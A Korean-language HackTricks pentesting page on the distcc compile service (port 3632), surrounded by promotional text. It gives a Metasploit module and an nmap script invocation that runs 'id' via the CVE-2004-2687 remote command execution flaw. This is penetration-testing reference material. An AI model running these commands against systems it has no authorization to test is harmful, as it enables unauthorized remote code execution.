hacktricks/network-services-pentesting/3632-pentesting-distcc.md

htARTE (HackTricks AWS Red Team 전문가)에서 AWS 해킹을 처음부터 전문가까지 배우세요!

HackTricks를 지원하는 다른 방법:

• 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하고 싶다면 구독 요금제를 확인하세요!
• 공식 PEASS & HackTricks 스왜그를 구매하세요
• The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
• 💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm을 팔로우하세요.
• HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

기본 정보

Distcc는 네트워크의 다른 컴퓨터의 유휴 처리 능력을 활용하여 컴파일 프로세스를 개선하는 도구입니다. Distcc가 기계에 설정되면 이 기계는 컴파일 작업을 다른 시스템으로 분산할 수 있습니다. 수신 시스템은 distccd 데몬을 실행하고 보낸 코드를 처리할 수 있는 호환되는 컴파일러가 설치되어 있어야 합니다.

기본 포트: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

임의 코드를 실행하기 위해 CVE-2004-2687에 취약한지 확인하세요:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

이 서비스를 Shodan이 감지하지는 않을 것 같습니다.

자원

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

**Álex B (@r1p)**가 작성한 게시물

제로부터 AWS 해킹을 전문가로! htARTE (HackTricks AWS Red Team Expert)으로 배우세요!

HackTricks를 지원하는 다른 방법:

• 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 구독 요금제를 확인하세요!
• 공식 PEASS & HackTricks 스왜그를 구입하세요
• The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
• 💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 저장소에 PR을 제출하여 해킹 요령을 공유하세요.